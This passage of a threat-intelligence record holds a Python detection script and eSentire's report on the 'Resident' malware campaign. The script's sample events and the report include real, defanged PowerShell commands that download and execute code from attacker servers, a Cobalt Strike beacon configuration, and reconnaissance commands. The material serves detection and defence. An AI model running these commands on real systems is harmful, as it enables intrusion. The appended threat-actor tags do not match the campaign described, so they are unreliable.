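    'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://62.204.41[.]155:80/sjj63NS\'))"',
    r"powershell Invoke-WebRequest hxxps://temp[.]sh/BOTnt/netping.exe -OutFile C:\programdata\netping.exe",
    r"rundll32.exe shell32.dll,ShellExec_RunDLL C:\ProgramData\RtlUpd\payload.exe",
    r"rundll32.exe nsis_uns1a2b3c4d, PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|",
    r"certutil.exe -decode C:\ProgramData\cert.txt C:\ProgramData\p.dll",
    r"wscript.exe C:\Users\user\Downloads\invoice.js",
    r"C:\ProgramData\Dored\i_view32.exe /capture /convert=skev.jpg",
    'net group "domain admins" /domain',
    r"notepad.exe C:\Users\user\notes.txt",
]

# Rule names are this example's own; patterns follow the command shapes in the report.
RULES = [
    ("node_backdoor_launch",
     re.compile(r"hcmd\.exe\s+index\.js\s+\d+", re.I)),
    ("ps_download_cradle",
     re.compile(r"powershell.*?(downloadstring|invoke-webrequest|\biwr\b|net\.webclient)", re.I)),
    ("rundll32_shellexec",
     re.compile(r"rundll32(\.exe)?\s+shell32\.dll\s*,\s*ShellExec_RunDLL", re.I)),
    ("rundll32_nsis_printuientry",
     re.compile(r"rundll32(\.exe)?\s+nsis_uns[0-9a-f]*\s*,\s*PrintUIEntry", re.I)),
    ("certutil_decode",
     re.compile(r"certutil(\.exe)?\b.*-decode\b", re.I)),
    ("wscript_js",
     re.compile(r"wscript(\.exe)?\b.*\.js\b", re.I)),
    ("irfanview_capture",
     re.compile(r"i_view32(\.exe)?\b.*/capture", re.I)),
    ("domain_admins_recon",
     re.compile(r'net\s+group\s+"?domains?\s+admins', re.I)),
]


def classify(cmdline: str) -> list:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events=SAMPLE_EVENTS) -> list:
    """Return (cmdline, [rule names]) for each event that hit at least one rule."""
    hits = []
    for ev in events:
        names = classify(ev)
        if names:
            hits.append((ev, names))
    return hits


if __name__ == "__main__":
    for ev, names in triage():
        print(f"{', '.join(names):28} {ev}")
```

Several of these rules are noisy on their own (certutil and IrfanView have legitimate uses), so the value is in combination: two or more hits from one host within a short window, or any hit that follows a wscript.exe launch of a downloaded .js file, is what justifies pulling the full process tree.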
The threat\r\nactor(s) also attempted to pull a Cobalt Strike payload from 62.204.41[.]155, which is also the server the beacon uses as its C2 (see the configuration below).\r\nThe command line used to retrieve the Cobalt Strike payload from the established backdoor session:\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object\r\nnet.webclient).downloadstring('hxxp[:]//62.204.41[.]155:80/sjj63NS'\r\nThe following is the beacon configuration:\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 60000,\r\n \"MaxGetSize\": 1048576,\r\n \"Jitter\": 0,\r\n \"C2Server\": \"62.204.41[.]155,/pixel\",\r\n \"HttpPostUri\": \"/submit.php\",\r\n \"Malleable_C2_Instructions\": [],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 1580103824,\r\n \"bStageCleanup\": \"False\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"bProcInject_UseRWX\": \"True\",\r\n \"bProcInject_MinAllocSize\": 0,\r\n \"ProcInject_PrependAppend_x86\": \"Empty\",\r\n \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n \"ProcInject_Execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"\"\r\n}\r\nConclusion\r\nOur TRU team identified a malicious campaign known as Resident, which is believed to be carried out by Russian native-speaking threat actors. 
The threat actors behind Resident attempt to infiltrate networks and exfiltrate data from\r\ninfected machines using backdoors, Cobalt Strike, and stealers. In particular, they have been observed using the\r\nRhadamanthys stealer, which is known for its stealth capabilities, instead of more widely known stealers such as\r\nRedline and Vidar.\r\nThe threat actors use these techniques to gain a foothold and move laterally across a network, making it difficult\r\nfor victims to detect or respond quickly. The campaign could cause significant disruption and financial losses for those\r\nimpacted. As such, eSentire’s Threat Intelligence team, in collaboration with TRU, has engineered various detection\r\ncapabilities to detect and prevent Resident infections.\r\nHow eSentire is Responding\r\nOur Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create\r\npractical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity\r\nthreats by deploying countermeasures, such as:\r\nImplementing threat detections and BlueSteel, our machine-learning powered PowerShell classifier, to identify\r\nmalicious command execution and exploitation attempts and ensure that eSentire has visibility and detections in\r\nplace across eSentire MDR for Endpoint.\r\nPerforming global threat hunts for indicators associated with the Resident campaign and Rhadamanthys Stealer.\r\nOur detection content is supported by investigation runbooks, ensuring our SOC (Security Operations Center) analysts\r\nrespond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures. 
In addition, TRU closely monitors the threat landscape, constantly addresses capability gaps, and conducts retroactive threat hunts to assess customer impact.\r\nRecommendations from eSentire’s Threat Response Unit (TRU)\r\nWe recommend implementing the following controls to help secure your organization against the Rhadamanthys stealer and the Resident campaign:\r\nConfirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.\r\nUsing Phishing and Security Awareness Training (PSAT), educate your employees regarding the risk of commodity stealers and drive-by downloads.\r\nEnsure standard procedures are in place for employees to submit potentially malicious content for review.\r\nUse Windows Attack Surface Reduction rules to block JavaScript and VBScript from launching downloaded content.\r\nWhile the TTPs used by adversaries grow in sophistication, they create difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by threat actor(s) requires actively monitoring the threat landscape, developing and deploying endpoint detection, and the ability to investigate logs \u0026 network data during active intrusions.\r\neSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.\r\nIf you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.\r\nLearn what it means to have an elite team of Threat Hunters and Researchers that works for you. 
Connect with an eSentire Security Specialist.\r\nAppendix\r\nhttps://www.trendmicro.com/pl_pl/research/20/l/stealth-credential-stealer-targets-us-canadian-bank-customers.html\r\nhttps://isc.sans.edu/diary/29376\r\nhttps://socket.io/docs/v4/\r\nhttps://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot\r\nhttps://twitter.com/Kostastsale/status/1607681239837966337?s=20\u0026t=f7VZgGvjiy7TLzBHd2bAKg\r\nhttps://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/\r\nIndicators of Compromise\r\nYara rules\r\nrule Resident_binary\r\n{\r\n    meta:\r\n        author = \"eSentire Threat Intelligence\"\r\n        date = \"2023-01-17\"\r\n        version = \"1.0\"\r\n        MD5 = \"6e1cdf38adb2d052478c6ed8e06a336a\"\r\n    strings:\r\n        $certificate_blob = {\r\n            C7 00 2D 2D 2D 2D\r\n            C7 40 ?? 2D 42 45 47\r\n            C7 40 ?? 49 4E 20 43\r\n            C7 40 ?? 45 52 54 49\r\n            C7 40 ?? 46 49 43 41\r\n            C7 40 ?? 54 45 2D 2D\r\n            C7 40 ?? 2D 2D 2D 0D\r\n            C6 40 ?? 0A\r\n        }\r\n        $guid_build = {\r\n            FF 15 ?? ?? ?? ??\r\n            48 8D 0D ?? ?? ?? ??\r\n            E8 ?? ?? ?? ??\r\n            41 89 F1\r\n            41 89 D8\r\n            4C 89 E9\r\n            49 89 C4\r\n            0F B6 44 24 ??\r\n            89 7C 24 ??\r\n            4C 89 E2\r\n            89 44 24 ??\r\n            0F B6 44 24 ??\r\n            89 44 24 ??\r\n            0F B6 44 24 ??\r\n            89 44 24 ??\r\n            0F B6 44 24 ??\r\n            89 44 24 ??\r\n            0F B6 44 24 ??\r\n            89 44 24 ??\r\n            0F B6 44 24 ??\r\n            89 44 24 ??\r\n            0F B6 44 24 ??\r\n            89 44 24 ??\r\n            0F B6 44 24 ??\r\n            89 44 24 ??\r\n            FF 15 ?? ?? ?? ??\r\n        }\r\n    condition:\r\n        any of them\r\n}\r\nrule Rhadamanthys_Stealer {\r\n    meta:\r\n        author = \"eSentire Threat Intelligence\"\r\n        date = \"2023-01-17\"\r\n        version = \"1.0\"\r\n        MD5 = \"ccefe8680b7d168a9e840d25a6925db3\"\r\n    strings:\r\n        $shellcode = {37 41 52 51 41 41 41 41 53 43 49 4A 41 51 41 45 41 41 41 42 49 41 49 42}\r\n        $API1 = \"LoadLibraryA\"\r\n        $API2 = \"CreateCompatibleBitmap\"\r\n        $API3 = \"GetProcAddress\"\r\n    condition:\r\n        $shellcode and all of ($API*)\r\n}\r\nMITRE ATT\u0026CK\r\nMITRE ATT\u0026CK Tactic | ID | MITRE ATT\u0026CK Technique | Description\r\nReconnaissance | T1592 | Gather Victim Host Information | Resident performs reconnaissance on the infected host, for example viewing the members of the \"Domain Admins\" group in the current domain, IP configurations and the current user's group memberships. It also gathers information on active processes, caption, command line, creation date, computer name, executable path, OS name, and Windows version.\r\nInitial Access | T1566.001 | Phishing | The initial Resident payload is delivered via a phishing email containing an attachment.\r\nExecution | T1059.007 | Command and Scripting Interpreter: JavaScript | The initial Resident payload is written in JavaScript.\r\nPersistence | T1053.005 | Scheduled Task/Job: Scheduled Task | Resident creates a copy of itself and schedules a task to run it every 10 minutes starting from the time when the binary was first executed.\r\nPersistence | T1547.009 | Boot or Logon Autostart Execution: Shortcut Modification | CUGraphic.lnk is created to run the AutoHotKey and Imdb.vbs scripts.\r\nCobalt Strike | S0154 | - | Resident deploys Cobalt Strike on the infected hosts.\r\nCollection | T1113 | Screen Capture | The Resident campaign utilizes various tools to capture screenshots of the infected host.\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nThe malicious PowerShell command mentioned before retrieves and executes the PowerShell script from 31.41.244[.]142. The PowerShell script loads kernel32.dll and crypt32.dll via LoadLibraryA and uses the function CryptStringToBinaryA from crypt32.dll to convert the base64 string to a binary format (Figure 10).",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign"
	],
	"report_names": [
		"esentire-threat-intelligence-malware-analysis-resident-campaign"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434590,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88d7e23d50bdd2004b74e136c76a22034d7d5563.pdf",
		"text": "https://archive.orkl.eu/88d7e23d50bdd2004b74e136c76a22034d7d5563.txt",
		"img": "https://archive.orkl.eu/88d7e23d50bdd2004b74e136c76a22034d7d5563.jpg"
	}
}